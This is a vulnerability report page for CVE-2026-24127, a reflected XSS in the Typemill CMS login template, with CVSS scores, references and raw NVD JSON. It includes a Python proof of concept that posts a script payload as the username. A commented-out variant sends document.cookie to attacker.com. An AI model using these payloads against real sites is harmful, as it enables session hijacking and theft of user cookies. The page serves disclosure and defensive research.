Security Vulnerability Report
CVE-2026-24127 CVSS 5.4 MEDIUM

Published: 2026-01-23 23:15:54
Last Modified: 2026-02-02 13:32:54

Description

Typemill is a flat-file, Markdown-based CMS designed for informational documentation websites. A reflected Cross-Site Scripting (XSS) exists in the login error view template `login.twig` of versions 2.19.1 and below. The `username` value can be echoed back without proper contextual encoding when authentication fails. An attacker can execute script in the login page context. This issue has been fixed in version 2.19.2.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Note: the score above is the CNA's secondary assessment. The NVD primary assessment in the raw JSON below scores the same issue 6.1 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, i.e. with scope changed, which is how NVD typically scores reflected XSS because the script runs in the victim's browser rather than in the vulnerable component.
Weaknesses: CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-116 (Improper Encoding or Escaping of Output)

Configurations (Affected Products)

cpe:2.3:a:typemill:typemill:*:*:*:*:*:*:*:* - VULNERABLE
Typemill CMS <= 2.19.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-24127 PoC - Typemill CMS Reflected XSS
# Target: Typemill CMS login page
# Vulnerability: Unsanitized username parameter in login.twig template


def exploit_xss(target_url, payload):
    """
    Exploit the reflected XSS vulnerability in Typemill CMS login page.

    Args:
        target_url: Base URL of the Typemill CMS installation
        payload: Malicious JavaScript payload to inject

    Returns:
        Response from the server
    """
    # Login endpoint
    login_url = f"{target_url}/login"

    # Prepare malicious username with XSS payload
    data = {
        'authcode': 'test',   # Invalid authcode to trigger error
        'username': payload,  # XSS payload injected here
        'password': 'test',
    }

    # Send request with malicious username
    response = requests.post(login_url, data=data, allow_redirects=False)
    return response


# Example usage
if __name__ == "__main__":
    target = "http://vulnerable-server.com"

    # Basic XSS payload to steal cookies
    xss_payload = "<script>alert(document.cookie)</script>"

    # More advanced payload for cookie stealing
    # xss_payload = "<img src=x onerror='fetch(\"https://attacker.com/log?c=\"+document.cookie)'/>"

    print(f"[*] Targeting: {target}")
    print(f"[*] Payload: {xss_payload}")

    response = exploit_xss(target, xss_payload)

    print(f"[*] Response Status: {response.status_code}")
    print("[*] XSS payload sent. Victim will execute script on page visit.")

References

https://github.com/typemill/typemill/commit/b506acd11e80fb9c8db5fa6c2c8ad73580b4e88c (Patch)
https://github.com/typemill/typemill/releases/tag/v2.19.2 (Product, Release Notes)
https://github.com/typemill/typemill/security/advisories/GHSA-65x4-pjhj-r8wr (Third Party Advisory, Exploit)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24127", "sourceIdentifier": "[email protected]", "published": "2026-01-23T23:15:54.360", "lastModified": "2026-02-02T13:32:53.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Typemill is a flat-file, Markdown-based CMS designed for informational documentation websites. A reflected Cross-Site Scripting (XSS) exists in the login error view template `login.twig` of versions 2.19.1 and below. The `username` value can be echoed back without proper contextual encoding when authentication fails. An attacker can execute script in the login page context. This issue has been fixed in version 2.19.2."}, {"lang": "es", "value": "Typemill es un CMS de archivo plano, basado en Markdown, diseñado para sitios web de documentación informativa. Un Cross-Site Scripting (XSS) reflejado existe en la plantilla de vista de error de inicio de sesión 'login.twig' de las versiones 2.19.1 e inferiores. El valor 'username' puede ser devuelto sin la codificación contextual adecuada cuando la autenticación falla. Un atacante puede ejecutar scripts en el contexto de la página de inicio de sesión. Este problema ha sido solucionado en la versión 2.19.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-116"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:typemill:typemill:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.19.2", "matchCriteriaId": "4E3CADA3-5037-4F37-9488-CE162A458090"}]}]}], "references": [{"url": "https://github.com/typemill/typemill/commit/b506acd11e80fb9c8db5fa6c2c8ad73580b4e88c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/typemill/typemill/releases/tag/v2.19.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/typemill/typemill/security/advisories/GHSA-65x4-pjhj-r8wr", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}